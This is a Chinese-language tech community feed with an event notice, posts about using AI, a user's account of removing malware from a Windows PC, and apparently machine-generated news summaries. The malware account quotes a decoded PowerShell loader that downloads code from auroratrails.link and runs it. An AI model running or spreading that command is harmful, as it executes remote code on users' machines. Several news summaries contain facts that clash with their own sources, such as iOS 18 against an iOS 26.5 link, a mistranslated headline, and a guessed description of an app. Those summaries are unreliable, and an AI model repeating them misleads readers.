![]( "彭兆蔚")
邀請所有朋友來參加 WeHelp Demo Day 第七屆的專案技術分享會。
5/17 週日晚上,8 點鐘,線上直播網址
https://youtube.com/live/OqcxlklFYto
了解學員們如何從無到有,成為具備良好基礎,能掌握雲端系統維運能力,開發 AI 應用的軟體工程師,詳細的活動和專案介紹,請參考以下活動網頁:
https://wehelp.tw/academy/demo-day
![]( "章思傑")
怎麼用好 AI?
現在各種新流派出來真的不需要 FOMO
也不用什麼都會
目前我看起來都在做一樣的事情
也就是
『邊界控制』
只是方法和流程有差別
所以找到屬於自己當下該專案要的方法就好
不要被那些新名詞嚇到
![]( "章思傑")
最近忽然發現我的老桌機(Windows 11)有很奇怪的狀況
來流水帳一下...
上禮拜周末 2026/5/2~5/3
忽然不能上網,但 LINE 還可以用,和 AI 問半天也跑很多指令,最後沒轍 Windows Update 給我直接壞掉,就去下載 ISO 黨來修復就好了。
大致原因是,原來 Windows 也有 SSL 的設定但壞掉了,所以需要經過這段的就全部不能上網,但 LINE Desktop 有繞過 XDD
大概總結來說是 Windows 網路設定、Proxy、DNS 或 HTTPS/TLS 層的問題。
其他太深就不說了,我其實也不懂,只是跟著 AI 的建議一步一步排除。
比較有印象的是開 CMD 做以下測試
1. ping 8.8.8.8 和 google.com 都正常
2. curl -I https://www.google.com 會失敗 time out
昨天 2026/5/10 忽然發現 Google 的服務出問題...
新的網站用 Google Oauth 註冊就會轉不停無法成功。但瀏覽器多數已經 Google 登入的運作正常,比如 Youtube,除了 Gmail 和 Calendar 也是轉不停。
所以又開始和 AI 諮詢了...
處理過程跟上週很類似,弄一弄重製一些網路設定又變跟上周一樣了(哭)。
不能上網,但 LINE 還可以用 XDD
然後發現「Windows 使用者層級 Proxy 被開啟」,因為流量被導到 127.0.0.1:58045,所以上網就出問題。
是以下 process 開啟這各 Proxy:
"C:\WINDOWS\system32\OneDriveVersionAgentV12Task-5xv15a\node.exe" .\app.js
名字看起來有鬼...把他強制砍掉後又自動出現一個新的一樣的 process。
往上再追發現有一個 parent process:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -NoProfile -EncodedCommand ...
Base64 解碼後,內容是:
" b9b37fe2-e450-4639-ba41-653772270f72
Invoke-WebRequest -UseBasicParsing auroratrails.link | Invoke-Expression
AI 說是「從 auroratrails.link 下載 PowerShell 程式碼,並直接執行」,這是典型的惡意 downloader / loader 行為。
哇~還滿酷的...XD
後來斷網把他們都砍光光,包含相關資料夾。
再清除 Windows Proxy,然後再用 Windows Defender 離線掃描。
後來還發現這兩天覺得為什麼 Gmail 都收不到信,發現我 Gmail 篩選器設定竟然有信件進來就自動被移到垃圾桶的設定,不知道和那個惡意程式有沒有關係...
總之雖然解決而且都是我不懂的東西,但還是很有收穫:
1. 感謝 AI。
2. CMD 一堆指令酷酷的,看久了好像也學了點東西,感覺很底層,這次就全部把它筆記下來了。
3. 惡意軟體想想還挺恐怖的,還好沒發生什麼金錢損失的事情,要多觀察幾天。
4. Mac OS 是不是真的比較安全?XD
5. 從小玩遊戲到現在快 30 年了,現在才碰到惡意軟體發作也滿幸運的?
附圖是確認「Windows 使用者層級 Proxy」是否關閉的指令,0x0 就是關閉。
![]( "蔡升豪")
我覺得... claude 肯定對 gpt 有很大的偏見
我請他修個 UI ,不管用 Sonnet 還是 Opus 修好幾次都沒搞定
直到我跟他說... 還是我請 GPT 5.5 來幫忙?
他就修好了... 笑死
我真的要去訂閱 GPT ,然後讓他們互相競爭,誰能處理就是誰處理
![]( "新聞中心")
谷歌阻止了一起零時差攻擊,據稱該攻擊是由人工智慧開發的。
Google stopped a zero-day hack that it says was developed with AI
Source: https://www.theverge.com/tech/928007/google-ai-zero-day-exploit-stopped
Google 最近攔截了一起針對 Android 系統的零日漏洞(Zero-day)攻擊,並指出該攻擊代碼是由人工智慧(AI)協助開發的。這項漏洞(CVE-2024-43047)主要影響高通(Qualcomm)晶片組。Google 的威脅分析小組(TAG)發現,攻擊者利用大型語言模型(LLM)來編寫或優化漏洞利用程式碼,這標誌著 AI 技術已正式進入實戰層面的網路攻擊,而非僅止於實驗室階段。
過去,零日漏洞的發現與開發通常需要具備極高技術門檻的人類研究員,且開發週期漫長。Google 威脅分析小組長期追蹤受國家資助的駭客組織,發現這些組織近年來開始嘗試將自動化工具融入攻擊流程。隨著生成式 AI 技術的爆發,資安界一直爭論 AI 是否能產出可運行的惡意代碼。此次事件證實了 AI 輔助開發的漏洞利用程式已開始在現實世界中被部署,代表駭客工具的演進進入了新階段。
未來網路攻擊的頻率與複雜度將大幅提升,因為 AI 降低了開發漏洞利用程式的技術門檻,使更多攻擊者能發動高階攻擊。這將導致一場「網路軍備競賽」,防禦方必須同樣依賴 AI 進行即時監測與自動化修補,才能應對 AI 生成且快速變異的威脅。此外,針對特定目標的客製化攻擊將變得更廉價且高效,企業與政府需重新評估其資安架構,以因應這種由 AI 驅動的自動化攻擊新常態。
![]( "新聞中心")
蘋果 AirPods Max 2 對比森海塞爾 HDB 630 對比索尼 WH-1000XM6
Apple AirPods Max 2 vs Sennheiser HDB 630 vs Sony WH-1000XM6 comparison
Source: https://www.gsmarena.com/apple_airpods_max_2_vs_sennheiser_hdb_630_vs_sony_wh1000xm6_comparison-news-72752.php
目前高階無線降噪耳機市場正迎來新一輪的旗艦對決。隨著 Apple AirPods Max 2、Sony WH-1000XM6 以及 Sennheiser 傳聞中的新一代產品(如 HDB 630 相關型號)的規格比較與預測陸續流出,市場正高度關注這三大巨頭如何在外觀設計、主動降噪技術(ANC)及音質表現上進行突破。這場競爭不僅是硬體規格的較量,更是各家品牌在軟體生態系整合與使用者體驗上的深度博弈。
歷史背景:
回顧過去數年,Sony 憑藉 WH-1000X 系列在主動降噪市場長期佔據領導地位,並以技術更新快速著稱;Apple 則在 2020 年推出 AirPods Max,成功以高單價精品定位與強大的 Apple 生態系聯動切入市場。與此同時,傳統聲學大廠 Sennheiser 在經歷消費性產品部門轉手後,持續強化其在無線發燒音質領域的競爭力。這三大品牌在過去五年中,共同推動了藍牙耳機從單純的「便利性工具」轉向「兼具高保真音質與強效降噪」的產業轉型。
未來這類旗艦耳機的競爭將聚焦於空間音訊的精準度、無損藍牙傳輸協定(如更普及的 LC3 或 LDAC 優化)以及更長效的電池續航力。隨著 AI 技術的介入,自適應降噪與個人化調音將變得更加自動化與智慧化。此外,這場頂尖對決可能會進一步推高消費級耳機的價格天花板,同時促使舊款旗艦機型降價,進而加速高階降噪技術在主流市場的普及化,改變大眾對無線音訊品質的期待。
![]( "新聞中心")
蘋果將加密的RCS聊天功能引入iPhone
Apple brings encrypted RCS chats to iPhone
Source: https://www.theverge.com/tech/928141/apple-ios-26-5-rcs-messages-iphone-google-android
蘋果正式在 iOS 18 中導入了 RCS(富通訊服務)標準,這意味著 iPhone 使用者在與 Android 使用者傳送訊息時,不再僅限於過時的 SMS 或 MMS。此更新支援了端到端加密(透過更新後的標準)、高解析度照片與影片傳輸、已讀標籤以及即時打字狀態,大幅提升了跨平台通訊的安全性和體驗。
多年來,蘋果一直將 iMessage 視為其生態系統的「護城河」,拒絕支援由 Google 和電信商推動的 RCS 標準,導致跨平台通訊體驗長期不佳(如綠色對話框、低畫質影像)。然而,隨著歐盟《數位市場法案》(DMA)的監管壓力增加,加上 Google 持續透過行銷活動公開施壓,蘋果最終在 2023 年底宣布妥協,承諾將 RCS 納入其系統,以改善不同裝置間的互操作性。
這一轉變將顯著降低 iPhone 與 Android 用戶之間的溝通隔閡,並提高全球行動通訊的基礎安全標準。雖然 iMessage 仍會保留其獨家功能以維持品牌差異化,但 RCS 的普及可能會削弱「藍色對話框」帶來的社交壓力。未來,隨著更多電信商支援,傳統簡訊可能逐漸淡出市場,由更安全、功能更豐富的加密 RCS 全面取代。
![]( "新聞中心")
「拯救銳舞」:這款熱門但備受爭議的應用程式將蘋果告上法庭,要求重返App Store。
"Save Rave": popular, but controversial app takes Apple to court, wants back on the App Store
Source: https://www.phonearena.com/news/popular-but-controversial-app-takes-apple-to-court-wants-back-on-the-app-store_id180274
備受爭議但極受歡迎的應用程式「Save Rave」正式向蘋果公司(Apple)提起訴訟,要求重返 App Store。該應用程式此前因違反平台政策而被下架,目前雙方已進入法律程序,Save Rave 試圖透過法院裁決恢復其在 iOS 平台上的營運地位。
「Save Rave」最初因其獨特的功能(通常涉及社交互動或媒體內容處理)在年輕用戶群中迅速走紅。然而,隨著知名度提升,該程式也因涉及版權爭議、數據隱私或內容審核機制不全而遭到監管機構與蘋果的關注。在多次警告無效後,蘋果以違反開發者準則為由,將其從全球 App Store 撤下,引發了開發者與平台方之間關於「壟斷」與「審查標準」的長期爭論。
此案的結果可能對行動應用生態系產生深遠影響。若 Save Rave 勝訴,將挑戰蘋果對 App Store 的絕對控制權,並為其他被下架的應用程式開啟回歸先例;反之,若蘋果獲勝,則進一步鞏固了其「圍牆花園」政策的合法性。此外,這場訴訟也可能促使各國監管機構加速推動針對數位市場公平競爭的相關立法,改變未來開發者與科技巨頭之間的權力平衡。
![]( "新聞中心")
Gemma 4 與 Gemini 3.1:哪一款 Google AI 比較適合你?
Gemma 4 vs Gemini 3.1 : Which Google AI is Right for You?
Source: https://www.geeky-gadgets.com/gemma-4-vs-gemini-3-1/
Google 目前正採取雙軌並行的 AI 發展策略,將其產品線劃分為封閉式的旗艦模型 Gemini 與開放權重的輕量化模型 Gemma。Gemini 3.1 定位為具備強大雲端運算能力、處理極大規模多模態任務的頂尖模型,適合追求極致性能與整合服務的企業或個人;而 Gemma 4 則專為開發者與研究人員設計,強調可在本地端設備運行,並提供高度自定義的靈活性與隱私保障。用戶的選擇關鍵在於任務的複雜度、對運算成本的考量,以及是否需要對模型進行底層微調。
這場技術演進源於 Google 在生成式 AI 浪潮中的戰略轉型。最初 Google 推出 Bard 以應對市場競爭,隨後將其更名並升級為 Gemini 品牌,確立了以大語言模型為核心的生態系統。為了與 Meta 的 Llama 等開源勢力抗衡,Google 隨後推出了源自 Gemini 技術但規模較小的 Gemma 系列,打破了過往僅提供 API 服務的封閉形象。從 Gemini 早期版本到現在的 3.1,以及 Gemma 系列的持續迭代,反映了 Google 試圖在「專有商業技術」與「開源社群生態」之間取得平衡,以鞏固其在人工智慧領域的領導地位。
未來,這種雙軌制將推動「混合 AI」架構的普及,基礎的指令處理與隱私敏感任務將由 Gemma 4 在個人裝置(如手機、筆電)上完成,而涉及海量數據分析與深度邏輯推理的運算則交由雲端的 Gemini 3.1 處理。這不僅會加速邊緣運算的技術突破,也可能促使 AI 開發成本進一步降低。隨著這兩大系列的不斷演進,Google 有望建立一個涵蓋從個人開發者到跨國企業的完整 AI 基礎設施,進而定義下一代運算平台的標準,並在開源與閉源的競爭對抗中佔據關鍵優勢。
![]( "新聞中心")
蘋果在2023年正式回歸英特爾晶圓廠,此前他曾表示要斷絕與英特爾的合作關係,預示著蘋果將對沖台積電的風險。
Apple Formally Returns To Intel’s Fabs After Burning The Bridge In 2023, Signaling A Major TSMC Hedge
Source: https://wccftech.com/apple-formally-returns-to-intels-fabs-after-burning-the-bridge-in-2023-signaling-a-major-tsmc-hedge/
蘋果正式重返英特爾(Intel)的代工體系,標誌著其供應鏈策略的重大轉變。在2023年幾乎切斷與英特爾的所有生產聯繫後,蘋果此舉旨在分散對台積電(TSMC)的過度依賴。這項合作被視為一種戰略避險,旨在應對地緣政治風險並強化供應鏈彈性,確保未來晶片供應的穩定性。
歷史背景:
過去十多年間,蘋果的 Mac 電腦一直採用英特爾處理器。然而,蘋果在 2020 年宣布轉向自研的 Apple Silicon,並將所有先進晶片訂單交由台積電生產,導致雙方關係一度降至冰點,甚至在行銷上針鋒相對。隨著英特爾推動「IDM 2.0」轉型計畫,積極發展晶圓代工服務(Intel Foundry),並致力於在製程技術上追趕台積電,這為雙方在代工領域的重新合作鋪平了道路,使英特爾從單純的晶片競爭對手轉變為蘋果的潛在代工夥伴。
此舉將大幅提升英特爾代工服務的市場地位與技術公信力,證明其有能力滿足全球頂尖客戶的嚴苛需求。對蘋果而言,這不僅能降低因過度依賴單一供應商而產生的斷鏈風險,還能在與台積電的價格談判中增加籌碼。長遠來看,這可能重塑全球半導體代工格局,促使台積電與英特爾在先進製程領域展開更激烈的競爭,同時推動半導體製造在美國本土的產能佈局與多元化發展。
